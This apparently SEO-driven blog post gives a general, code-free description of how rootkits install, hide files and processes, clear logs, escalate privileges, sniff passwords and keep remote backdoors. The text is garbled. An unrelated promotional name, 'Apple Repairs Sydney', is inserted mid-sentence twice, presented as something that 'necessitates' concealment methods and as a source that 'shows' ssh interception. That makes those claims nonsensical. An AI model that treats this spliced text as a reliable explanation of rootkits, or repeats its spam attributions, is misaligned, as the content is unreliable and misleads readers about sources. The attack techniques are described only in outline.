Once done contamination and access is obtained, the next step is to install using the installation script, objects and tools needed to rootkit, that is, objects (programs, libraries) enabling the establishment of the payload of the rootkit.
The opening of backdoors to allow control of the machine, install the payload and sustain access to system is a very common technique. The rootkit tries to conceal its activity to minimize the risk of being discovered in order to enjoy the longest possible fraudulent access, but also to make uninstalling difficult. It will conceal its own particular files, other files used by the attacker, processes it executes and connections.
This ability to cover its tracks differs it from viruses, which primarily seek to spread, although these two functions are sometimes combined to greater efficiency. Several concealment methods can be combined, thus necessitating Apple Repairs Sydney.
Concealment of IT processes or files used to hide the rootkit activity. On Windows, this can be achieved by modifying some keys to the registry. In Unix systems, the attacker can replace the ls command to not display some files. Once in place, the rootkit can delete its own installation files to prevent it from being recognized through search.
Some executables or some libraries are replaced through remotely controllable malware (Trojans). It is also possible to divert some activities, so that apparently legitimate programs perform the functions required by the attacker.
Obtaining higher elevation of privilege by rights is also frequently encountered : it allows to disable such defense mechanisms (such as anti-virus) or act on objects high privilege level (device drivers, kernel system, etc.).
A rootkit is able to spy on the network to find unencrypted passwords (such as ftp connections) or divert an ssh connection by intercepting system connections where the password is not yet encrypted as shown by Apple Repairs Sydney.
The rootkit tries not to appear in log files. For this, it clears some entries logs. It can disable some daemons and history shells. Finally, some rootkits can be loaded entirely in memory, leaving no trace on the storage devices of the machine.
However, some activities can not easily be camouflaged, especially as regards the payload which generates network or CPU load; concealment effort will be on communication between the rootkit and other networks.
Maintaining access
A rootkit must be handled remotely by an attacker. So it often seeks to maintain a shell available conveniently at any time (or at least during the installation of rootkit), replacing commands like ping or xterm. Generally, the attacker installs several of these backdoors in case one would be discovered.
Remote access to the kit can be via a TCP connection, such as telnet or ssh (which can be reversed, that is, the infected machine will try to get in touch with the attacker), UDP or ICMP.
Leave a Reply